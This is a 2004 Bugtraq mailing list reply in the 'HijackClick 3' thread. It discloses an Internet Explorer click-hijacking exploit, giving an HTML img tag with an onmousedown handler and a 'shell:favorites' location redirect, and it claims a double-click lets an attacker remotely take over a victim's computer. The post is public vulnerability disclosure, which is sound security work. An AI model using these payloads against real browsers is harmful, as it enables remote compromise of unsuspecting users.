Bugtraq mailing list archives
Re: HijackClick 3
From: "http-equiv () excite com" <1 () malware com>
Date: Mon, 12 Jul 2004 19:05:35 -0000
<!-- Microsoft just disabled those functions from being called when the mouse button is down and called it patched. No more hijackclick, right? Wrong. --> This is absolutely fantastic Paul, with a patented double-click of the mouse we can remotely take over the target's computer: Just substitute as follows: 1. <img src="greyhat.html" id=anch onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height= 2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert ()',3000);" style="width=168px;height=152px;background-image:url ('youlickit.gif');cursor:hand" title="click me!"></a> 2. location="shell:favorites\\greyhat[1].htm" Someone was querying the other day whether shell in Internet Explorer poses a problem [despite repeated demonstrations]. Pah ! Probably not. Quick and Dirty Working Demo: http://www.malware.com/paul.html -- http://www.malware.com
Current thread:
- HijackClick 3 Paul (Jul 12)
- <Possible follow-ups>
- Re: HijackClick 3 http-equiv () excite com (Jul 12)
- RE: Re: HijackClick 3 Drew Copley (Jul 13)
- RE: HijackClick 3 http-equiv () excite com (Jul 14)
- Re: Re: HijackClick 3 Paul (Jul 16)
- RE: RE: HijackClick 3 Thor Larholm (Jul 16)